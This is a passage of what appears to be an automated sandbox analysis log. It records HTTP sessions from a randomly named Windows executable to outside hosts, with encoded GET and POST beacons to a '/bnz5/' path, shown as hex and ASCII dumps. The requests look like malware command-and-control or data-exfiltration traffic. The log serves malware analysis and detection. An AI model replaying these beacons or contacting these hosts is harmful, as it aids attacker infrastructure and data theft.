                                                                                                      Data Ascii: </div> </nav> <div class="container-xxl py-5 bg-primary hero-header"> <div class="container my-5 py-5 px-lg-5"> <div class="row g-5 py-5"> <div c
                                                                                                      Apr 16, 2024 12:01:10.223953009 CEST1289INData Raw: 20 70 78 2d 6c 67 2d 35 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 22 3e 0d 0a
                                                                                                      Data Ascii: px-lg-5 text-center"> <div class="row justify-content-center"> <div class="col-lg-6"> <i class="bi bi-exclamation-triangle display-1 text-primary"></i> <h
                                                                                                      Apr 16, 2024 12:01:10.223989964 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e 3c 2f 69 3e 69 6e 66 6f 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 3c 2f 70 3e 0d 0a 20 20 20
                                                                                                      Data Ascii: <p><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-twitter"></i></a
                                                                                                      Apr 16, 2024 12:01:10.224159002 CEST1289INData Raw: 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 74 65 78 74 2d 77 68 69 74 65 20 68 35 20 6d 62 2d 34 22 3e 47 61 6c 6c 65 72 79 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii: ss="section-title text-white h5 mb-4">Gallery<span></span></p> <div class="row g-2"> <div class="col-4"> <img class="img-fluid" src="img/portfolio-1.jpg" al
                                                                                                      Apr 16, 2024 12:01:10.224195957 CEST1289INData Raw: 2d 36 20 63 6f 6c 2d 6c 67 2d 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 74 65 78 74 2d 77 68 69 74 65 20 68 35 20 6d 62 2d 34 22
                                                                                                      Data Ascii: -6 col-lg-3"> <p class="section-title text-white h5 mb-4">Newsletter<span></span></p> <p>Lorem ipsum dolor sit amet elit. Phasellus nec pretium mi. Curabitur facilisis ornare velit non vulpu</p
                                                                                                      Apr 16, 2024 12:01:10.224404097 CEST1289INData Raw: 69 6e 6b 2f 62 61 63 6b 6c 69 6e 6b 2c 20 79 6f 75 20 63 61 6e 20 70 75 72 63 68 61 73 65 20 74 68 65 20 43 72 65 64 69 74 20 52 65 6d 6f 76 61 6c 20 4c 69 63 65 6e 73 65 20 66 72 6f 6d 20 22 68 74 74 70 73 3a 2f 2f 68 74 6d 6c 63 6f 64 65 78 2e
                                                                                                      Data Ascii: ink/backlink, you can purchase the Credit Removal License from "https://htmlcodex.com/credit-removal". Thank you for your support. ***/-->Designed By <a class="border-bottom" href="https://htmlcodex.com">HTML Codex</a>
                                                                                                      Apr 16, 2024 12:01:10.224438906 CEST379INData Raw: 61 79 70 6f 69 6e 74 73 2f 77 61 79 70 6f 69 6e 74 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6c 69 62 2f 63 6f 75 6e 74 65 72 75 70 2f 63 6f 75 6e 74 65 72 75 70 2e 6d 69 6e
                                                                                                      Data Ascii: aypoints/waypoints.min.js"></script> <script src="lib/counterup/counterup.min.js"></script> <script src="lib/owlcarousel/owl.carousel.min.js"></script> <script src="lib/isotope/isotope.pkgd.min.js"></script> <script src="li


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      28192.168.2.549747203.161.50.128802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:12.739690065 CEST455OUTGET /bnz5/?gr=xJEpvmsSZWMn08k0fswZUF3i8FJV6XmZDE9zwebvcwnWaSyOd7ieKTZxqd8LfY736VbykJAs8QtIZUIve9rpP7hx1kot6ym/I/JMbr2a3NM5FLBwcSvbdBi7Xsx3rbBzJg==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.fusionndustries.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:01:12.904314041 CEST1289INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:12 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 11834
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 26 66 61 6d 69 6c 79 3d 4a 6f 73 74 3a 77 67 68 74 40 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65 73 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 61 6e 69 6d 61 74 65 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>DGital - Digital Agency HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500&family=Jost:wght@500;600;700&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" rel="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> <link href="li
                                                                                                      Apr 16, 2024 12:01:12.904356956 CEST1289INData Raw: 62 2f 6c 69 67 68 74 62 6f 78 2f 63 73 73 2f 6c 69 67 68 74 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61
                                                                                                      Data Ascii: b/lightbox/css/lightbox.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet">
                                                                                                      Apr 16, 2024 12:01:12.904393911 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 22 6e 61
                                                                                                      Data Ascii: </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav mx-auto py-0"> <a href="index.html" class="nav-item nav-link">Home</a>
                                                                                                      Apr 16, 2024 12:01:12.904434919 CEST1289INData Raw: 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69
                                                                                                      Data Ascii: </a> </div> </nav> <div class="container-xxl py-5 bg-primary hero-header"> <div class="container my-5 py-5 px-lg-5"> <div class="row g-5 py-5">
                                                                                                      Apr 16, 2024 12:01:12.904659033 CEST1289INData Raw: 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 78 2d 6c 67 2d 35 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 6a 75 73 74 69 66 79 2d 63 6f 6e
                                                                                                      Data Ascii: lass="container px-lg-5 text-center"> <div class="row justify-content-center"> <div class="col-lg-6"> <i class="bi bi-exclamation-triangle display-1 text-primary"></i>
                                                                                                      Apr 16, 2024 12:01:12.904697895 CEST1289INData Raw: 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e 3c 2f 69 3e 69 6e 66 6f 40 65 78 61 6d 70
                                                                                                      Data Ascii: 7890</p> <p><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-t
                                                                                                      Apr 16, 2024 12:01:12.905019999 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 74 65 78 74 2d 77 68 69 74 65 20 68 35 20 6d 62 2d 34 22 3e 47 61 6c 6c 65 72 79 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0d 0a 20 20 20
                                                                                                      Data Ascii: <p class="section-title text-white h5 mb-4">Gallery<span></span></p> <div class="row g-2"> <div class="col-4"> <img class="img-fluid" src="img/port
                                                                                                      Apr 16, 2024 12:01:12.905059099 CEST1289INData Raw: 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6c 67 2d 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 74 65 78 74
                                                                                                      Data Ascii: v class="col-md-6 col-lg-3"> <p class="section-title text-white h5 mb-4">Newsletter<span></span></p> <p>Lorem ipsum dolor sit amet elit. Phasellus nec pretium mi. Curabitur facilisis ornare vel
                                                                                                      Apr 16, 2024 12:01:12.905097008 CEST1289INData Raw: 6b 2f 61 74 74 72 69 62 75 74 69 6f 6e 20 6c 69 6e 6b 2f 62 61 63 6b 6c 69 6e 6b 2c 20 79 6f 75 20 63 61 6e 20 70 75 72 63 68 61 73 65 20 74 68 65 20 43 72 65 64 69 74 20 52 65 6d 6f 76 61 6c 20 4c 69 63 65 6e 73 65 20 66 72 6f 6d 20 22 68 74 74
                                                                                                      Data Ascii: k/attribution link/backlink, you can purchase the Credit Removal License from "https://htmlcodex.com/credit-removal". Thank you for your support. ***/-->Designed By <a class="border-bottom" href="https://htmlcodex.com">HTML Codex</a>
                                                                                                      Apr 16, 2024 12:01:12.905132055 CEST394INData Raw: 72 69 70 74 20 73 72 63 3d 22 6c 69 62 2f 77 61 79 70 6f 69 6e 74 73 2f 77 61 79 70 6f 69 6e 74 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6c 69 62 2f 63 6f 75 6e 74 65 72 75
                                                                                                      Data Ascii: ript src="lib/waypoints/waypoints.min.js"></script> <script src="lib/counterup/counterup.min.js"></script> <script src="lib/owlcarousel/owl.carousel.min.js"></script> <script src="lib/isotope/isotope.pkgd.min.js"></script>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      29192.168.2.549748134.122.178.172802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:18.841782093 CEST700OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.66bm99.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.66bm99.shop
                                                                                                      Referer: http://www.66bm99.shop/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 4d 4e 34 74 64 68 64 73 62 63 4e 37 39 70 56 4f 49 50 36 6f 6f 4a 70 56 71 71 6a 6d 4c 31 73 5a 31 54 42 45 6b 70 51 7a 63 73 2f 78 65 36 47 30 51 36 32 78 73 35 6e 32 61 33 6b 71 68 51 36 6e 56 48 6e 58 51 6f 48 54 2f 7a 2b 43 4c 54 32 37 37 47 65 4d 58 2b 62 43 4e 31 6e 6f 4c 61 32 37 39 34 46 35 71 44 58 4b 59 51 6f 77 63 41 77 35 66 6f 37 37 42 4d 6f 38 7a 55 75 78 71 62 38 50 71 6f 59 4b 49 71 52 50 62 74 31 56 64 73 59 69 42 71 4e 4b 36 69 59 4a 51 6c 6d 35 42 61 59 4e 52 4a 75 77 6f 45 5a 53 42 7a 56 46 75 74 77 2f 68 34 51 51 75 36 5a 58 31 7a 5a 59 6c 6d 6a 4a 58 47 64 75 44 6c 45 3d
                                                                                                      Data Ascii: gr=MN4tdhdsbcN79pVOIP6ooJpVqqjmL1sZ1TBEkpQzcs/xe6G0Q62xs5n2a3kqhQ6nVHnXQoHT/z+CLT277GeMX+bCN1noLa2794F5qDXKYQowcAw5fo77BMo8zUuxqb8PqoYKIqRPbt1VdsYiBqNK6iYJQlm5BaYNRJuwoEZSBzVFutw/h4QQu6ZX1zZYlmjJXGduDlE=
                                                                                                      Apr 16, 2024 12:01:19.203001976 CEST748INHTTP/1.1 405 Not Allowed
                                                                                                      Date: Tue, 16 Apr 2024 10:01:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Server: cdn-ddos-cc
                                                                                                      X-Cache-Status: MISS
                                                                                                      Data Raw: 32 32 63 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 22c<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      30192.168.2.549749134.122.178.172802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:21.695467949 CEST720OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.66bm99.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.66bm99.shop
                                                                                                      Referer: http://www.66bm99.shop/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 4d 4e 34 74 64 68 64 73 62 63 4e 37 73 35 6c 4f 4e 6f 47 6f 67 4a 70 57 70 71 6a 6d 65 6c 73 64 31 54 4e 45 6b 74 49 5a 63 66 62 78 64 65 43 30 43 76 4b 78 76 35 6e 32 56 58 6b 76 73 77 36 73 56 48 71 71 51 70 37 54 2f 7a 61 43 4c 54 47 37 37 31 6d 50 58 75 62 41 43 56 6e 75 46 36 32 37 39 34 46 35 71 44 44 67 59 51 67 77 63 77 67 35 4e 5a 37 34 49 73 6f 6a 36 30 75 78 75 62 38 54 71 6f 59 73 49 72 38 55 62 76 4e 56 64 74 6f 69 41 2f 35 4c 30 69 59 4c 50 56 6e 39 53 4f 42 45 63 61 75 4f 73 32 49 7a 47 68 4d 2b 76 62 64 56 37 61 59 34 39 61 31 76 6c 67 52 76 30 57 43 67 4e 6c 4e 65 64 79 52 32 34 36 4f 67 6a 30 77 36 30 65 6a 69 78 76 50 58 55 2b 66 2f
                                                                                                      Data Ascii: gr=MN4tdhdsbcN7s5lONoGogJpWpqjmelsd1TNEktIZcfbxdeC0CvKxv5n2VXkvsw6sVHqqQp7T/zaCLTG771mPXubACVnuF62794F5qDDgYQgwcwg5NZ74Isoj60uxub8TqoYsIr8UbvNVdtoiA/5L0iYLPVn9SOBEcauOs2IzGhM+vbdV7aY49a1vlgRv0WCgNlNedyR246Ogj0w60ejixvPXU+f/
                                                                                                      Apr 16, 2024 12:01:22.047858953 CEST748INHTTP/1.1 405 Not Allowed
                                                                                                      Date: Tue, 16 Apr 2024 10:01:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Server: cdn-ddos-cc
                                                                                                      X-Cache-Status: MISS
                                                                                                      Data Raw: 32 32 63 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 22c<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
